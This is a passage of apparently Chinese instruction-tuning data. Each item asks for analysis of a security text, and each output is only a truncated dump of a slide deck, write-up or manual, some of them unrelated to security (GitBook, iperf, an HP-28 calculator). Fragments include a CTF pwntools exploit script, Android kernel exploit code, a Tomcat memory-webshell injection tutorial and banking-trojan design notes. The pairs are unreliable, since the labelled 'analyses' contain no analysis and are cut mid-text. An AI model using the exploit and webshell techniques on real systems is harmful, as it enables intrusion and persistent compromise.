Sense of Security 2014 Page of 58  Aug-14 Agenda 4 Hosted VoIP 101 Network Attacks Attacking CUCDM Attacking CUCM Attacking SIP Attacking Clients Attacking Skinny www.senseofsecurity.com.au  Sense of Security 2014 Page of 58  Aug-14 Hosted VoIP services 5 www.senseofsecurity.com.au  Sense of Security 2014 Page of 58  Aug-14 Hosted VoIP environment  Vendors are Cisco and VOSS Solutions  Web based services  IP Phone services (Cisco, VOSS* IP Phone XML Services)  Tenant client services management (VOSS* Selfcare)  Tenant* services management (VOSS* Domain Manager)  VoIP services  Skinny (SCCP) services for Cisco phones  SIP services for other tenant phones  RTP servic", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n--- title: GITBOOK --- ## 使用 Gitbook 来做笔记 ### 装包 ``` npm install gitbook-cli -g ``` ### 创建笔记文件夹note并进入 ``` mkdir note && cd note ``` ### 初始化gitbook ``` gitbook init ``` 这样会生成2个文件 - README.md 封面 - SUMMARY.md 目录 ### 启动项目 ``` gitbook serve ``` 这样可以启动一个服务器然后到 localhost:4000 端口就可以看到这本书了 ### 在浏览器打开 ``` localhost:4000 ``` ### 调整结构 在note新建content文件夹将README.md,SUMMARY.md文件放在里面 ``` note -> content -> README.md,SUMMARY.md ``` 创建 git 文件夹然后里面就可以写笔记了其实 gitbook 本身的使用技巧基本就是这些了 ``` note -> content -> git ``` ## 托管gitbook ### 在github上创建node仓库 ### 然后把项目变成一个**nodejs**的项目 ``` npm init -y ``` ### 然后在package.json 中添加这些代码 ``` \"scripts\": { \"start\": \"gitbook serve ./content ./gh-pages\", \"build\": \"gitbook build ./content ./gh-pages\", \"deploy\": \"node ./scripts/deploy-gh-pages.js\", \"publish\": \"npm run build && npm run deploy\", \"port\": \"lsof -i :35729\" }, ``` ### 运行本地gitbook ``` npm start ``` ### 删除_book文件夹 ``` rm -r _book ``` ### 在note文件夹里创建一个.gitignore文件将不上传的文件添加 ``` # dependencies /node_modules /scripts /gh-pages ``` ### github备份上传操作 ``` git init git add -A git commit -a -m 'new' git remote add origin https://github.com/l552177239/note.git git push -u origin master ``` ### 部署书籍到 gh-pages 这一步可以手动做 - 第一步运行`npm run build`把md文件转化为html放到gh-pages文件夹 - 第二步拷贝gh-pages中的所有文件到gh-pages分支然后上传 - 第三步以后每次修改完都拷贝到gh-pages分支很麻烦 所以我们采用一个 npm 包来帮助我们完成上面的操作 **装包** ``` npm i gh-pages --save ``` 然后创建配置文件`note/scripts/deploy-gh-pages.js` 将下面代码拷贝进去 ```js 'use strict'; var ghpages = require('gh-pages'); main(); function main() { ghpages.publish('./dist', console.error.bind(console)); } ``` 这样每次书稿有了修改运行 ``` npm run publish ``` 就可以把书稿部署到 http://l552177239.github.io/note ### 编辑书籍 可以修改 SUMMARY.md 来添加书籍目录 ``` # Summary * [Introduction](README.md) //README.md封面内容 * 第一章 - [第一小节学习 Github](./git/1-github.md) //[目录上的名称](展示文章的地址) - [第二小节学习 Gitbook](./git/2-gitbook.md) - [第三小节Github 基本操作](./git/3-github.md) ``` 文章内用`markdown`语法书写具体怎么写请看下一章", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nBluehat Shanghai 2019 | David dwizzzle Weston | Microsoft OS Security Group Manager Advancing Windows Security 早上好 上海 Windows for PCs Familiar desktop experience Broad hardware ecosystem Desktop app compat One Core OS Base OS App and Device Platform Runtimes and Frameworks Windows on XBOX 10 Shell experience Unique security model Shared gaming experience Windows on IOT Base OS App and Device Platform Runtimes and Frameworks Windows for  Form factor appropriate shell experience Device specific scenario support Windows is evolving. Malicious code cannot persist on a device. Violations of promises are observable. All apps and system components have only the privilege they need. All code executes with integrity. User identities cannot be compromised, spoofed, or stolen. Attacker with casual physical access cannot modify data or code on the device. Increasing Security Windows 10 S 10 S Classic 2 1 Mandatory Code Signing Complete Password-less Admin-less user account 4 3 Internet scripts and macros blocked 1 Run as admin 2 Execute Unsigned Code 3 Use passwords 4 Mitigations not always on 10 S: Millions of installs, no widespread detections of malware All code executes with integrity. Code Integrity Improvements CI policy removes many proxy binaries Store signed only apps (UWP or Centennial) Remote file extensions that support dangerous actions are blocked Remote Office Macros are blocked by default Windows 10 S All binaries Microsoft Signed Proxy Binaries Dangerous Handlers Remote Dangerous Files 1st Order Code Integrity protection A 1st order CI bypass enables a remote attack to trigger initial unsigned code execution 10 S focuses on preventing 1st order bypasses A 2nd order bypass enabled additional unsigned code execution after reaching initial code execution 10 S offers less durable guarantees for 2nd order bypasses Windows 10 S Network Physical Machine Trigger Handler No Yes Exploit mitigation Strategy Increase Cost of Exploitation Control Flow Integrity Signed Code ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nByteCTF WriteUp By Nu1L author:Nu1L ByteCTF WriteUp By Nu1L Pwn ByteCSMS Babyandroid eazydroid bytezoom Reverse languages binding moderncpp 0x6d21 Web Unsecure Blog double sqli Misc checkin Survey HearingNotBelieving Crypto JustDecrypt overhead easyxor Pwn ByteCSMS #! /usr/bin/python2 # coding=utf-8 import sys from pwn import * context.log_level = 'debug' context(arch='amd64', os='linux') def Log(name): log.success(name+' = '+hex(eval(name))) elf = ELF(\"./pwn\") libc = ELF(\"./libc.so.6\") if(len(sys.argv)==1): #local cmd = [\"./pwn\"] sh = process(cmd) else: #remtoe sh = remote(\"39.105.103.24\", 30011) def Num(n): sh.sendline(str(n)) def Login(): while True: sh.recvuntil('Password for admin:\\n') sh.send('\\x00'*0x18) res = sh.recv(9) if(res!='Incorrect'): break def Cmd(n): sh.recvuntil('> ') Num(n) def Add(name, score, nl=True): Cmd(1) sh.recvuntil('Enter the ctfer\\'s name:\\n') if(nl): sh.sendline(name) else: sh.send(name) sh.recvuntil('Enter the ctfer\\'s scores\\n') Num(score) sh.recvuntil('Enter 1 to add another, enter the other to return\\n') Num(2) def RemoveByName(name): Cmd(2) sh.recvuntil('2.Remove by index\\n') Num(1) sh.recvuntil('he name of the ctfer to be deleted\\n') sh.sendline(name) def RemoveByIdx(idx): Cmd(2) sh.recvuntil('2.Remove by index\\n') Num(2) sh.recvuntil('Index?\\n') Num(idx) def EditByName(name, new_name, sco): Cmd(3) sh.recvuntil('2.Edit by index\\n') Num(1) sh.recvuntil('Enter the name of the ctfer to be edit\\n') sh.sendline(name) sh.recvuntil('Search results are as follows\\n') res = sh.recvuntil('Enter the new name:\\n', drop=True) sh.sendline(new_name) sh.recvuntil('Enter the new score:\\n') Num(sco) return res def EditByIdx(idx, new_name, sco): Cmd(3) sh.recvuntil('2.Edit by index\\n') Num(2) sh.recvuntil('Index?\\n') Num(idx) res = sh.recvuntil('Enter the new name:\\n', drop=True) sh.sendline(new_name) sh.recvuntil('Enter the new score:\\n') Num(sco) return res def Upload(): Cmd(4) def Download(): Cmd(5) def GDB(): gdb.attach(sh, ''' break *(0x0000555", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n#!/usr/bin/python import gmpy from Crypto.Util.number import * from Crypto.PublicKey import RSA from Crypto.Cipher import PKCS1_v1_5 flag = open('flag', 'r').read() * 30 def ext_rsa_encrypt(p, q, e, msg): m = bytes_to_long(msg) while True: n = p * q try: phi = (p - 1)*(q - 1) d = gmpy.invert(e, phi) pubkey = RSA.construct((long(n), long(e))) key = PKCS1_v1_5.new(pubkey) enc = key.encrypt(msg).encode('base64') return enc except: p = gmpy.next_prime(p**2 + q**2) q = gmpy.next_prime(2*p*q) e = gmpy.next_prime(e**2) p = getPrime(128) q = getPrime(128) n = p*q e = getPrime(64) pubkey = RSA.construct((long(n), long(e))) f = open('pubkey.pem', 'w') f.write(pubkey.exportKey()) g = open('flag.enc', 'w') g.write(ext_rsa_encrypt(p, q, e, flag))", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nMonitoring Surveillance Vendors: A Deep Dive into In-the-Wild Android Full Chains in 2021 Xingyu Jin Christian Resell Clement Lecigne Richard Neal #BHUSA @BlackHatEvents #BHUSA @BlackHatEvents Introduction Xingyu @1ce0ear Richard @ExploitDr0id Christian @0xbadcafe1 #BHUSA @BlackHatEvents Agenda  Examples of full-chains found in-the-wild by TAG  CVE-2021-0920 deep dive  Post exploitation  Exploit in Google Play  Defending Android  Conclusion #BHUSA @BlackHatEvents  Goal: Protect Google and our users  Hunting for 0-days exploited in-the-wild  Tracking more than 30 surveillance vendors  Exploits shared/sold between groups  Two Android full-chains found in 2021  From different surveillance vendors Threat Analysis Group #BHUSA @BlackHatEvents  Served to an up-to-date Android phone  Two 0-days were exploited:  CVE-2021-38003: Chrome renderer 0-day in JSON.stringify  CVE-2021-1048: epoll refcount bug  CVE-2021-1048 was fixed quickly in the upstream kernel  Not the first time we have seen this (e.g. CVE-2019-2215 aka Bad Binder) Android Full-chain #1 #BHUSA @BlackHatEvents Android Full-chain #1: Exploitation void *libc_map = mmap(NULL, libc_size, PROT_READ, MAP_PRIVATE, libc_fd, 0); int fd = socket(AF_LOCAL, SOCK_DGRAM, 0); fput(fd); usleep(500); int mfd = memfd_create(\"foobar\", 0); void *rw_map = mmap(NULL, libc_size, PROT_READ | PROT_WRITE, MAP_SHARED, fd, 0); close(fd); close(mfd); usleep(500); int lfd = open(LIBC_PATH, O_RDONLY); uint32_t foobar; for (size_t i = 0; i < libc_size; i += PAGE_SIZE) { foobar = *(uint32_t *)&libc_map[i]; foobar = *(uint32_t *)&rw_map[i]; } memcpy(rw_map, \"booom\", 5); #BHUSA @BlackHatEvents Android Full-chain #1: Exploitation void *libc_map = mmap(NULL, libc_size, PROT_READ, MAP_PRIVATE, libc_fd, 0); int fd = socket(AF_LOCAL, SOCK_DGRAM, 0); fput(fd); usleep(500); int mfd = memfd_create(\"foobar\", 0); void *rw_map = mmap(NULL, libc_size, PROT_READ | PROT_WRITE, MAP_SHARED, fd, 0); close(fd); close(mfd); usleep(500); int lfd = open(LIBC_PATH, O", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nKILLSUIT RESEARCH F-Secure Countercept Whitepaper F-Secure | Killsuit research 2 CONTENTS What is Killsuit and how does it work ......................................................3 What is Killsuit ...................................................................................3 How does Killsuit infect a machine ...............................................3 How does it work .............................................................................3 How to deploy and configure a KillSuit instance .........................4 Extra capabilities  Some modular functions .............................. 6 How does KillSuit install itself on a system ............................................ 9 Initial run at installation identifiers analysis .................................. 9 Hunting for the list & into the rabbit hole ....................................11 Refocus and results ........................................................................14 How to detect and remediate a KillSuit compromise ......................... 15 How to detect KillSuit installation ................................................ 15 How to remove Killsuit from your host .......................................16 Conclusion ............................................................................................... 17 Appendix ..................................................................................................18 Killsuit instance ID list ....................................................................18 Full Danderspritz driver list ...........................................................18 Registry list  First part ..........................................................................................18 Registry list  Second Part .....................................................................................18 Sources .....................................................................................................21 F-Secure | Killsuit resea", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# be-quick-or-be-dead-3 Reversing, 350 points ## Description: > As the [song](https://www.youtube.com/watch?v=CTt1vk9nM9c) draws closer to the end, another executable **be-quick-or-be-dead-3** suddenly pops up. This one requires even faster machines. Can you run it fast enough too? Attached was a binary file. ## Solution: Let's run the file: ```console root@kali:/media/sf_CTFs/pico/be-quick-or-be-dead-3/v2# ./be-quick-or-be-dead-3 Be Quick Or Be Dead 3 ===================== Calculating key... You need a faster machine. Bye bye. ``` Time to analyze the program. We'll use Radare2. ```console r2 be-quick-or-be-dead-3 ``` Analyze the binary with `aa` and list the functions with `afl`: ``` root@kali:/media/sf_CTFs/pico/be-quick-or-be-dead-3/v2# r2 be-quick-or-be-dead-3 -- When you sold that exploit, what they really bought, was your silence. [0x004005a0]> aa [x] Analyze all flags starting with sym. and entry0 (aa) [0x004005a0]> afl 0x004004e8 3 26 sym._init 0x00400520 1 6 sym.imp.putchar 0x00400530 1 6 sym.imp.puts 0x00400540 1 6 sym.imp.printf 0x00400550 1 6 sym.imp.alarm 0x00400560 1 6 sym.imp.__libc_start_main 0x00400570 1 6 sym.imp.__sysv_signal 0x00400580 1 6 sym.imp.exit 0x00400590 1 6 fcn.00400590 0x004005a0 1 41 entry0 0x004005d0 4 50 -> 41 sym.deregister_tm_clones 0x00400610 4 58 -> 55 sym.register_tm_clones 0x00400650 3 28 sym.__do_global_dtors_aux 0x00400670 4 38 -> 35 entry1.init 0x00400696 6 112 sym.decrypt_flag 0x00400706 4 140 sym.calc 0x00400792 1 16 sym.calculate_key 0x004007a2 1 31 sym.alarm_handler 0x004007c1 3 84 sym.set_timer 0x00400815 1 43 sym.get_key 0x00400840 1 40 sym.print_flag 0x00400868 4 62 sym.header 0x004008a6 1 62 sym.main 0x004008f0 4 101 sym.__libc_csu_init 0x00400960 1 2 sym.__libc_csu_fini 0x00400964 1 9 sym._fini [0x004005a0]> ``` The `main` function is similar to the previous two challenges. Just like last time, if we disable the timer, we hang and the program does not return in a reasonable time. Like last time, the `get_key` funct", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nModule 2 Typical goals of malware and their implementations https://github.com/hasherezade/malware_training_vol1 Dissecting a Banking Trojan Banking Trojans - families  Zbots  (a family of various forks of the ZeuS code)  IcedID  Tinba  Gozi (and Gozi-based)  Kronos  TrickBot (some of the modules)  ...and others Elements of a Banking Trojan  Classic banking trojans modify the content of selected websites (related to banking transactions)  Webinjects  Webgrabbers  An important element of a banking trojan is MITB proxy (Man-In-The-Browser)  MITB proxy is a local proxy via which the traffic is bypassed and modified  Sometimes to bypass the protections used by banks, the operator needs to remotely access and use the victim machine (using Hidden VNC) Elements of a Banking Trojan Malicious implant Malware core module Communicate with the C2 server Browser process A process running malware core Elements of a Banking Trojan  Malware can run its own Proxy server to which the browser will connect, whenever it tries to connect with the target address  The redirection is implemented by hooking the function responsible for establishing the connection  The traffic that bypassed by the malicious proxy is parsed, and may be augmented with webinjects Operation of a Banking Trojan  Instead of connecting directly to the remote server, the browser connects to the local proxy, run by the malwares core module infected Operation of a Banking Trojan  The requested page is first processed by the malicious proxy... original Operation of a Banking Trojan  The proxy uses a special template to know where to implant the webinjects  When the pattern is found, the malicious code is implanted infected MiTB Proxy - implementation  Run a local proxy able to parse HTTP/HTTPS traffic  Requires generating your own certificate  Redirect all the HTTP/HTTPS traffic via the local proxy:  Hook functions in the browser:  1) the functions responsible for establishing the connection  2) the functions responsibl", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# 十七服务端请求伪造 > 作者Peter Yaworski > 译者[飞龙](https://github.com/) > 协议[CC BY-NC-SA 4.0](http://creativecommons.org/licenses/by-nc-sa/4.0/) ## 描述 服务端请求伪造或者 SSRF是一种类型它允许攻击者使用目标服务器来代表攻击者自己执行 HTTP 请求这和 CSRF 类似因为两个漏洞都执行了 HTTP 请求而不被受害者察觉在 SSRF 中受害者是漏洞服务器在 CSRF 中它是用户的浏览器 这里的潜力非常大包括 + 信息暴露其中我们欺骗服务器来暴露关于自身的信息在示例 1 中使用 AWS EC2 元数据描述 + XSS如果我们让服务器渲染远程 HTML 文件其中带有 JavaScript ## 示例 ### 1\\. ESEA SSRF 和 AWS 元数据请求 难度中 URL`https://play.esea.net/global/media_preview.php?url=` 报告链接`http://buer.haus/2016/04/18/esea-server-side-request-forgery-and-querying-aws-meta-data/` 报告日期2016.4.18 奖金$1000 描述 电子运动娱乐联盟 (ESEA) 是一个电子运动视频竞技比赛的社区由 ESEA 建立最近他们启动了一个漏洞奖励计划Brett Buerhaus 在上面发现了一个不错的 SSRF 漏洞 使用 Google DorkingBrett 搜索`site:https://play.esea.net/ ext:php`这让 Google 在`play.esea.net`域中搜索 PHP 文件查询结果包括`https://play.esea.net/global/media_preview.php?url=` 看看这个 URL似乎 ESEA 从外部站点渲染内容在寻找 SSRF 的时候这是一个危险标志像他描述的那样Brett 尝试它自己的域名`https://play.esea.net/global/media_preview.php?url=http://ziot.org`但是没有作用结果ESEA 寻找图片文件所以它尝试包含图片的载荷首先使用 Google 作为域名之后是它自己的`https://play.esea.net/global/media_preview.php?url=http://ziot.org/1.png` 成功了 现在这里真实的漏洞是欺骗服务器渲染其它内容而不是预设的图片在他的博文中Brett 描述了通常的技巧例如使用空字符`%00`额外的斜杠以及问号来绕过或欺骗后端在它的例子中它向 URL 添加了`?``https://play.esea.net/global/media_preview.php?url=http://ziot.org/?1.png` 它所做的就是将前面的文件路径`1.png`转换为参数并且不是实际要渲染的 URL 的一部分因此ESEA 渲染了它的页面换句话说它绕过了第一个测试的额外检查 现在这里你可以尝试执行 XSS 载荷像他描述的那样只需创建一个带有 JavaScript 的简单 HTML 页面让站点渲染它就这么简单但是它更进了一步使用来自 Ben Sadeghipour 的输入在我的 YouTUbe 频道和 Polyvore RCE 的 Hacking Pro Tips Interview #1 中提到过它测试了 AWS EC2 实例元数据的查询 EC2 是 Amazon 的弹性计算云它们提供了查询自身的功能通过它们的 IP来拉取关于实例的元数据权限很明显限制为实例自身但是由于 Brett 能够控制服务器从哪里加载内容它能够使其调用自身并拉取元数据 EC2 的文档在这里`http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2instance-metadata.html`这里是一些你可以抓取的敏感信息 > 重要结论 > Google Dorking 是一个不错的工具它能在发现所有类型的可能利用时节省你的时间如果你正在寻找 SSRF 漏洞要留意任何在远程内容中拉取的目标 URL这里它的标志是`url=` > 其次不要仅限于你的第一想法Brett 完全能够报告 XSS 载荷但是这不太深入通过深入挖掘它就能发现漏洞的真正价值但是这样做的时候要小心不要越界 ## 总结 服务端请求伪造在服务器可悲利用来代表攻击者执行请求时出现但是并不是所有请求最终都能利用例如由于站点允许你提供图片的 URL但它会复制并在自己站点上使用就像上", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\niperf === 网络性能测试工具 ## 补充说明 **iperf命令** 是一个网络性能测试工具iperf可以测试TCP和UDP带宽质量iperf可以测量最大TCP带宽具有多种参数和UDP特性iperf可以报告带宽延迟抖动和数据包丢失利用iperf这一特性可以用来测试一些网络设备如路由器防火墙交换机等的性能 iperf分为两种版本Unix/Linux版和Windows版Unix/Linux版更新比较快版本最新Windows版更新慢Windows版的iperf叫jperf或者xjperfjperf是在iperf基础上开发了更好的UI和新的功能 Linux版本下载地址http://code.google.com/p/iperf/downloads/list ### 安装iperf 对于windows版的iperf直接将解压出来的iperf.exe和cygwin1.dll复制到%systemroot%目录即可对于linux版的iperf请使用如下命令安装 ```shell gunzip -c iperf-<version>.tar.gz | tar -xvf - cd iperf-<version> ./configure make make install ``` ### 选项 ```bash -f, --format \\[bkmaBKMA] # 格式化带宽数输出支持的格式有 # 'b' = bits/sec # 'B' = Bytes/sec # 'k' = Kbits/sec # 'K' = KBytes/sec # 'm' = Mbits/sec # 'M' = MBytes/sec # 'g' = Gbits/sec # 'G' = GBytes/sec # 'a' = adaptive bits/sec # 'A' = adaptive Bytes/sec 自适应格式是kilo-和mega-二者之一 # 除了带宽之外的字段都输出为字节除非指定输出的格式默认的参数是a # 注意在计算字节byte时Kilo = 1024 Mega = 10242Giga = 10243 # 通常在网络中Kilo = 1000 Mega = 10002 and Giga = 10003所以Iperf也按此来计算比特位 # 如果这些困扰了你那么请使用-f b参数然后亲自计算一下 -i, --interval # # 设置每次报告之间的时间间隔单位为秒如果设置为非零值就会按照此时间间隔输出测试报告默认值为零 -l, --len #\\[KM] # 设置读写缓冲区的长度TCP方式默认为8KBUDP方式默认为1470字节 -m, --print\\_mss # 输出TCP MSS值通过TCP\\_MAXSEG支持MSS值一般比MTU值小40字节通常情况 -p, --port # # 设置端口与服务器端的监听端口一致默认是5001端口与ttcp的一样 -u, --udp # 使用UDP方式而不是TCP方式参看-b选项 -w, --window #\\[KM] # 设置套接字缓冲区为指定大小对于TCP方式此设置为TCP窗口大小 # 对于UDP方式此设置为接受UDP数据包的缓冲区大小限制可以接受数据包的最大值 -B, --bind host # 绑定到主机的多个地址中的一个对于客户端来说这个参数设置了出栈接口对于服务器端来说 # 这个参数设置入栈接口这个参数只用于具有多网络接口的主机在Iperf的UDP模式下此参数用于绑定和加入一个多播组 # 使用范围在224.0.0.0至239.255.255.255的多播地址参考-T参数 -C, --compatibility # 与低版本的Iperf使用时可以使用兼容模式不需要两端同时使用兼容模式但是强烈推荐两端同时使用兼容模式 # 某些情况下使用某些数据流可以引起1.7版本的服务器端崩溃或引起非预期的连接尝试 -M, --mss # ip头减去40字节在以太网中MSS值 为1460字节MTU1500字节许多操作系统不支持此选项 -N, --nodelay # 设置TCP无延迟选项禁用Nagle's运算法则通常情况此选项对于交互程序例如telnet是禁用的 -V (from v1.6 or higher) # 绑定一个IPv6地址 服务端$ iperf -s V 客户端$ iperf -c -V 注意在1.6.3或更高版本中指定IPv6地址不需要使用-B参数绑定在1.6之前的版本则需要在大多数操作系统中将响应IPv4客户端映射的IPv4地址 ``` 服务器端专用选项 ```bash -s, --server # Iperf服务器模式 -D (v1.2或更高版本) # Unix平台下Iperf作为后台守护进程运行在Win3", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nDeveloping Managed Code Rootkits for the Java Runtime Environment Developing Managed Code Rootkits for the Java Runtime Environment DEFCON 24, August 6th 2016 Benjamin Holland (daedared) ben-holland.com DEFCON 24, August 6th 2016 Developing Managed Code Rootkits for the Java Runtime Environment Developing Managed Code Rootkits for the Java Runtime Environment $ whoami Background JReFrameworker Modules Mitigations Q/A Developing Managed Code Rootkits for the Java Runtime Environment DEFCON 24, August 6th 2016 Developing Managed Code Rootkits for the Java Runtime Environment Developing Managed Code Rootkits for the Java Runtime Environment $ whoami Background JReFrameworker Modules Mitigations Q/A $ whoami DEFCON 24, August 6th 2016 Developing Managed Code Rootkits for the Java Runtime Environment Developing Managed Code Rootkits for the Java Runtime Environment $ whoami Background JReFrameworker Modules Mitigations Q/A $ whoami Benjamin Holland (daedared) B.S. in Computer Engineering (2005 - 2010) Wabtec Railway Electronics, Ames Lab, Rockwell Collins B.S. in Computer Science (2010 - 2011) M.S. in Computer Engineering and Information Assurance (2010 - 2012) MITRE Iowa State University Research (2012 - 2015) DARPA Automated Program Analysis for Cybersecurity (APAC) Program PHD in Computer Engineering (2015-????) DARPA Space/Time Analysis for Cybersecurity (STAC) Program DEFCON 24, August 6th 2016 Developing Managed Code Rootkits for the Java Runtime Environment Developing Managed Code Rootkits for the Java Runtime Environment $ whoami Background JReFrameworker Modules Mitigations Q/A DEFCON Inspirations It is truly an honor to be here... Early memories of reading Winn Schwartaus Information Warfare One of my first introductions to security topics This talk itself was inspired by a previous DEFCON talk DEFCON 24, August 6th 2016 Developing Managed Code Rootkits for the Java Runtime Environment Developing Managed Code Rootkits for the Java Runtime Environment $ whoami Ba", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nJourney to the Center of the HP28C/S by Travis Goodspeed <travis at utk.edu> regarding the work of Paul Courbis Sébastien Lalande Disclaimer I am just the translator. My French sucks. HP 28S Photo by Kurt Moerman Part 1: Software  Objects: List and Structure  I/O Zone  RAM  Accessing Machine Language  Further Discoveries  Useful Routines Introduction  Three Models  HP28C-1BB  HP28C-1CC  HP28S-2BB  HP SATURN architecture, same as HP 71b  Nibble-wise Little Endian Memory Layout FFFFF 60000 40800 4F000 52000 00000 40000 ROM Screen Timer Void RAM Void HP 28C HP 28S FFFFF 6 Ko 50000 Standard ROM Screen Timer Void RAM Void ROM Screen Timer Void RAM Void 40800 4F000 52000 34 Ko ROM FFFFF C0000 Void Screen Timer RAM Void D0000 E0000 FF800 Standard 00000 00000 40000 40000 DupRAM Registers OUTPUT INPUT CARRY I/O Status 12 16 1 4 HW Status 16 Status P D0,D1 PC 20 20 each 20 Pointers RSTK 20 by 8 R0 to R4 64 each Safeguard A to D 64 each Working Nybbles (Quartets)  Byte  0x00 to 0xFF  0 to 255  Nibble  0 to F  BCD  0 to 9 1 0 4 2 00 01 ... ... Nybble Little Endian #1234 12 34 Big Endian 12 34 Little Endian HP 28 3 4 1 2 Objects: List and Structure  Prologue  5 nibbles  Specifies Type  Type  System or User  Implies Length Short Integer #02911 Prologue Number 11920 54321 11920 00000 00000 12345 5 5 Real #02933 Prologue Exponent Mantissa Sign 5 3 12 1 33290 500 953562951413 0 π*105 #02933 5 3.14159... + Reverse Polish Notation  Stack Metaphor  Left to right.  If value  PUSH onto stack.  If operator,  POP parameters.  PUSH result.  No grouping symbols.  Easy to interpret. 1 10 3 + * 1 10 3 + * + 1 10 3 * RPN Interpretation  Input  Stack + 1 10 3 * 10 10 3 3 * 30 1 1 + 31 Algebraic #02ADA Prologue Expression End. Alg. 5 5 π*105 π 10 5 *  π 10 5 *  Algebraic #02ADA Prologue Expression End. Alg. 5 5 π*105 π 10 5 *  π 10 5 *  Algebraic #02ADA Prologue Expression End. Alg. 5 5 π*105 π 10 5 *  π 10 5 *  Algebraic #02ADA Prologue Expression End. Alg. 5 5 π*105 π 10 5 *  π 10 5 *  Prologue", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nPolicy Backgrounder Wireless Public Safety Data Networks Operating on Unlicensed Airwaves: Overview and Profiles By Naveen Lakshmipathy Updated  March 2007 From the firefighters who died on 9/11 to the rescue workers struggling to help victims of Hurricane Katrina, recent crises have demonstrated that the absence of reliable and interoperable voice and data communications among public safety agencies is an urgent national dilemma. While the need for voice interoperability among first responders is a fundamental and long-standing public safety issue that must be resolved in a timely manner, many communities across the nation have already begun to supplement their voice communication networks with wireless broadband data networks operating over unlicensed spectrummost notably the 2.4 GHz Wi-Fi band. These cutting-edge mobile high-speed data networks complement voice systems and serve as a cost- effective means to deliver applications such as streaming video for surveillance and disaster response, fast downloads of suspect mug shots or building blueprints, and access to public safety databases. By providing first responders with more resources in the fieldand reducing the time they need spend in the office  these wireless data networks act as a force multiplier, improving overall public safety. From TV to Public Safety Americas upcoming transition to digital television (DTV) offers the potential both to solve the voice interoperability problem once and for all, as well as to foster the development of high- quality, high-speed wireless data networks, by freeing up valuable and desperately needed airwaves in the prime 700 MHz TV band spectrum. These airwaves travel farther using less power and better penetrate through obstacleswhich would significantly boost the quality and reduce the cost of deploying community, municipal, and regional wireless broadband networks which could be utilized for public safety. Today, such networks primarily utilize the crowded 2.4 GHz Wi-Fi ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nFilter内存马 分类 filter 内存马是 servlet-api 内存马下的一种在tomcat高版本中存在实现了动态注册 tomcat 组件的方法其中就存在 addFilter 方法用于动态注册 Filter . Filter 生命周期 如果之前有调试tomcat源码的话可以知道 Filter 是在 tomcat 服务器启动时通过 init 方法启动 的服务器关闭时通过 destroy 方法销毁中间通过执行 doFilter 方法进行进行过滤 public class demoFilter implements Filter { @Override public void init(FilterConfig filterConfig) throws ServletException { System.out.println(\"Filter init.....\"); } @Override public void doFilter(ServletRequest request, ServletResponse response, FilterChain chain) throws IOException, ServletException { System.out.println(\"Filter执行了\"); //考虑是否放行 //放行 chain.doFilter(request,response); System.out.println(\"filter返回了\"); request.getServletContext().addFilter(); } @Override public void destroy() { System.out.println(\"Filter destroy.....\"); } } 从源码角度来看看 Filter 的生命周期 1. 初始化filter在服务器的初始化阶段完成filter注册 org.apache.catalina.core.ApplicationContext 在服务器初始化阶段 ApplicationContext 类中会首先判断状态之后进行 Filter 的初始化阶段将 Filter 相关信息填充到 filterDefs  filterMaps  filterConfigs 两个参数此处应该注意的是 context对象表示的是StandarContext对象 2. 首先是 filterDefs 参数填充 3. 之后是 filterMaps 的填充 4. 最后是 filterConfigs 的填充这一步是在执行过滤器的 init 方法之后 5. 之后在 standardContext 类中进行类的初始化这一步会调用 Filter 的 init 方法 6. Filter 执行首先是 FilterChain 的创建和添加 Filter 的创建是在初始化阶段但是每一次 请求都会重新创建这个 FilterChain 并且会将 servlet 放入 FilterChain 当中 7. 在 createFilterChain 中会遍历初始化时填充的 filterMaps ,取出 filter 信息然后组装 filterChain 8. 销毁在服务器关闭时销毁 Filter 内存马思路 按照上面源代码中 Filter 的初始化过程我们通过获取 StandardContext 属性然后模拟填充 过程将三个参数填充完毕即可然后在下一次请求的过程中就会自动将我们自定义的 filter 组 装到 FilterChain 当中 源码参考n1nty-Tomcat源代码调试笔记-看不见的shell这篇文章应该是最开始研究内存马的文章 了原理就是一直通过反射获取到 StandardContext 属性然后填充 Filter 的三个属性 <%@ page language=\"java\" contentType=\"text/html; charset=UTF-8\" pageEncoding=\"UTF-8\"%> <%@ page import=\"java.io.IOException\"%> <%@ page import=\"javax.servlet.DispatcherType\"%> <%@ page import=\"javax.servlet.Filter\"%> <%@ page import=\"javax.servlet.FilterChain\"%> <%@ page import=\"javax.servlet.FilterConfig\"%> <%@ page import=\"javax.servlet.FilterRegistration\"%> <%@ page import=\"javax.servle", "category": "text_analysis", "source": "security_papers"}
